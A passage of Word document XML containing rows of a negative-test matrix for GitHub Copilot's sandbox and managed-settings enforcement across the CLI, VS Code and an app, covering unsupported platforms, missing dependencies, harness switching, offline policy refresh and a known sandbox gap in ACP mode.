            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox OFF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NG-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Unsupported Windows build, user setting only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Test VM without KB5124010/KB5124006</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1469" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Saved preference turned off for the session </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">with a notice</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/sandbox enable</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> refused</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Session starts, sandboxed processes fail; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Sandbox unavailable</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Retry sandbox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1569" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Command doesn't run; notification to install missing update</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Works (unsandboxed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NG-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Unsupported build + MDM/file </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">enabled: true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Same VM, Intune values applied</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1469" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Sandboxed commands </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">fail</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (never run open)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Same</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1569" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Same 🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NG-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Unsupported build + server-managed only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Remove MDM; server </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">enabled: true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1469" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Can be </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">declined</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> — runs unsandboxed unless </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">failIfUnavailable: true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1569" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NG-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">failIfUnavailable: true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Add to NG-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1469" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Model </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">and</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> tool execution blocked for the session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ 🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1569" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ 🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NG-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">WSL2 missing dependency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Remove </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">slirp4netns</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">bwrap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1469" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Error names missing dependency; restart after fix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1569" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ "Sandboxing might not work as expected"; doesn't run unsandboxed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Works</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NG-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Unsupported Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Alpine/musl devcontainer, or WSL1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1469" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍 Expect failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1569" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Not supported</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Works</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NG-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">ACP mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">copilot --acp</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">enabled: true</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allowBypass: false</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; write to a read-only path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1469" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Known issue #5089: write succeeds — sandbox not applied.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Fail until fixed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1569" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Write succeeds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NG-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">VS Code Local harness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Start a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Local</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> session on Windows; repeat FS-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1469" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1569" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Changed in 1.142:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> with managed </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sandbox.enabled: true</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> or a non-empty </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">permissions</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> object, Local is unavailable for new chats and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">opening an existing Local chat auto-moves it to the Copilot harness</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (original archived; nothing sent). Only if admins set </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">vscode.temporaryDefaultToLocalHarness: true</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> does Local remain — and then it is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">unsandboxed</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> on Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Same</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NG-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Claude / Codex harness in VS Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Any managed settings present; open harness picker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1469" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1569" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Claude and Codex harnesses </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">disabled</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (even with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">enabled: false</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Available</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NG-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Offline start with forced refresh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">forceRemoteSettingsRefresh: true</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; start client offline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1469" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Policy unconfirmed → affected operations restricted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Same</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1569" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Copilot features blocked until refresh succeeds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Works offline (if not set)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NG-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Bad WSL managed file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Make </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/etc/github-copilot/managed-settings.json</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> group-writable or a symlink</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1469" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ File </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">rejected</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> — verify policy falls back to other layers, and alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1569" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NG-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Broken user settings.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Add </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">#comment</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to the CLI file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1469" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍 File fails to parse — values don't load; check startup warning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1569" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">VS Code flags JSON errors in editor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NG-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">App cloud / remote-host session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Start a cloud or remote-host session in the app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1469" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
